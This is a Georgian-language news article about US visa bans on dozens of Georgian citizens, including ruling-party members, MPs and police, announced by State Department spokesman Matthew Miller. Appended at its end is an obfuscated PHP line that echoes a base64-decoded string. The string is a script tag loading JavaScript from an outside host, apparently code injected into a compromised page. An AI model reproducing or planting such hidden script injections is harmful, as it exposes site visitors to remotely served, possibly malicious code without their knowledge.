celsiusi
ავერსი საქკაბელი

 ამერიკის შეერთებულმა შტატებმა საქართველოს მოქალაქეს სავიზო აკრძალვები დაუწესა. ამის შესახებ აშშ-ის სახელმწიფო დეპარტამენტის სპიკერმა მეთიუ მილერმა ბრიფინგზე განაცხადა.

მისი თქმით, სანქციები ეხება ათობით პირს, მათ შორის "ქართული ოცნების" წევრებს, პარლამენტის წევრებს, ძალოვანი უწყების წარმომადგენლებს და სხვა მოქალაქეებს.

სანქციების მიზეზად დემოკრატიისთვის ძირის გამოთხრა და თავისუფლების შეზღუდვა დასახელდა. აშშ-ის სახელმწიფო დეპარტამენტის სპიკერის თქმით, თუ საქართველოში სიტუაცია გამოსწორებული არ იქნება, სანქციებს მოჰყვება დამატებითი ზომებიც.

"აშშ შეშფოთებული რჩება “ქართული ოცნების” ანტი-დემოკრატიული ქმედებებით, ისევე როგორც მისი ბოლო დროის განცხადებებითა და რიტორიკით. ეს ქმედებები საქართველოს ევროპული მომავლის გზიდან გადახვევის რისკს აჩენს და ეწინააღმდეგება საქართველოს კონსტიტუციას და ქართველი ხალხის სურვილს.

სავიზო აკრძალვებს ვუწესებთ, ათობით საქართველოს მოქალაქეს. ეს მოიცავს პირებს, ასევე მათი ოჯახის წევრებს, რომლებიც პასუხისმგებელია ან თანამონაწილეობს საქართველოს დემოკრატიისთვის ძირის გამოთხრაში ისეთი ქმედებებით, როგორიცაა მშვიდობიანი შეკრებისა და გამოხატვის უფლებისთვის ძირის გამოთხრა, მშვიდობიან დემონსტრანტებზე თავდასხმა, სამოქალაქო საზოგადოების წარმომადგენლების დაშინება და საქართველოს მთავრობის დავალებით დეზინფორმაციის განზრახ გავრცელება. სავიზო შეზღუდვების ეს პირველი ტრანში მოიცავს “ქართული ოცნების” პარტიის წევრებს, პარლამენტის წევრებს, სამართალდამცავებს და კერძო პირებს", - განაცხადა სახდეპის პრესსპიკერმა და დასძინა, რომ ჯერ კიდევ არის დრო, საქართველოს მთავრობამ ტრაექტორია, რომელსაც მიჰყვება, შემოაბრუნოს.

152
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");